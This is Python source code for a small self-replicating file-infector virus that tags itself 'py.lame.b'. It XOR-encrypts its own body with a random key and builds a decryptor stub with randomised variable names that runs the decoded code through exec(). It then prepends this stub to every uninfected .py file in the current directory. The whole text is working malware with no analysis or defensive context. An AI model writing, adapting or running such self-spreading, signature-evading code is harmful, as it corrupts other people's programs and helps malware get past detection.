import os, glob, random
crlf = chr(13) + chr(10)
newkey = random.randint(25, 50)
newcode = ''
newarr = '['

for letter in xxx:
	newcode += chr(letter ^ newkey)

i = 0
for letter in newcode:
	i += 1
	n = ord(letter)
	if i != len(newcode):
		newarr += str(n)  + ', '
	else:
		newarr += str(n) + ']'

a = chr(random.randint(65, 90)) + chr(random.randint(65, 90))
b = chr(random.randint(65, 90)) + chr(random.randint(65, 90))

newgen = 'xxx = ' + newarr + crlf
newgen += a + ' = ""' + crlf
newgen += 'for ' + b + ' in xxx:' + crlf
newgen += ' ' + a + ' += chr(' + b + ' ^ ' + str(newkey) + ')' + crlf
newgen += 'exec(' + a + ') # py.lame.b' + crlf

for filename in glob.glob(os.path.join('.', '*.py')):
        goatcode = open(filename, 'r').read()
        if not 'py.' + 'lame' in goatcode:
                open(filename, 'w').write(newgen + crlf + goatcode)
